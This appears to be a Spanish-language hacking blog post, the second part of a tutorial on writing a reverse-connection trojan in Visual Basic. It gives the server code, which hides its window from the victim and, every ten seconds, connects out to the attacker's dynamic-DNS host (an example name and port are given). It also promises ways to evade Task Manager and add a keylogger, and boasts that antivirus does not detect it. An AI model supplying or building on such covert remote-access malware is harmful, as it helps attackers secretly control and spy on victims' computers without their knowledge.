Como ya dije hoy publico la parte dos de nuestro troyano en visual basic. En la anterior vimos como funcionan los troyanos de conexión inversa y creamos un cliente para conectarnos a la víctima. En esta segunda parte veremos como crear el server.
Lo primero abrimos visual basic y creamos un nuevo proyecto o si ya lo tenemos lo abrimos. Añadimos el control winsock, esto ya os enseñe a hacerlo en el anterior tutorial. Y también añadimos un nuevo elemento que no habíamos visto antes, un timer, en la barra de herramientas es el icono que es un reloj.
Bien ahora que ya tenemos todo listo podemos empezar a trabajar.
Damos doble click sobre el programa y nos aparecerá el editor de texto. Nos tendrá que aparecer el siguiente código el cual ya vimos. Si no aparece lo añadimos.
Private Sub Form_Load()
Como ya sabéis esto indica que todo lo que se ponga entre estas dos lineas se ejecutara al empezar el programa. Así que ponemos entre las dos:
Private Sub Form_Load()
Me.Hide
Me.Hide sirve para ocultar el programa así cuando la víctima lo ejecute no sabrá que se esta ejecutando, simplemente no lo verá, a no ser que ejecute el administrador de tareas, pero mas adelante veremos como solventar el problema del administrador de tareas, así quedará bien oculto.
Ahora tendremos que configurar el timer. Para volver al editor visual le damos doble click a form1, donde pone Project-Project1, arriba a la izquierda. Ahora le damos solamente un click al timer que hemos agregado antes. Miramos donde pone Properties Timer 1, abajo a la derecha. Y donde pone interval pondremos 10000 , esto equivale a 10 segundos 10000 ms.
Damos doble click en el timer y nos volverá a aparecer el editor de código. Pondrá:
Private Sub Timer1_Timer()
End Sub
Esto significa que el programa realizara la acción que introduciremos entre las dos lineas cada intervalo de tiempo, en nuestro caso 10 segundos.
Entre estas dos lineas irá una parte muy importante del código, la que se conecta al cliente.
Private Sub Timer1_Timer()
winsock1.close
winsock1.connect "aqui pon tu no-ip" ,aquí pon el puerto que has abierto
End Sub
Ejemplo:
Private Sub Timer1_Timer()
winsock1.close
winsock1.connect "pedrito.zapto.org" ,4433 a
End Sub
Así se nos conectara cada nuestro cliente cada 10 segundos.
Ya tenemos finalizado el troyano. Para probarlo, tendremos que abrir el cliente y darle al botón de listen, así se nos quedara en modo escucha. Entonces abrimos el server que acabamos de crear. Y en el label del cliente que pusimos nos saldrá conectado!! Si no funcionara, tendríais que mirar si los puertos están bien configurados, si tenéis abierto el no-ip o si os salta algún error en el programa, aunque no creo. Por supuesto este troyano es inútil no tiene ninguna función, ninguna broma ni keylogger ni nada, solo nos sale cuando está conectado, así que en los próximos tutoriales, enseñaré a poner mas funciones al troyano. Una cosa importante que no se si os habéis fijado es que no lo detecta el antivirus, esto es porque ningún antivirus conoce la existencia de este troyano ya que lo hemos creado nosotros y solo nosotros, alguna ventaja tendrá hacer un troyano uno mismo no? Aquí os dejo un resumen del código utilizado, aunque es mas bien poco:
Private Sub Form_Load()
Me.Hide
Private Sub Timer1_Timer()
winsock1.close
winsock1.connect "aquí pon tu no-ip" ,aquí pon el puerto que has abierto
End Sub
Salu2 anónimo
No hay comentarios:
Publicar un comentario
Comentar: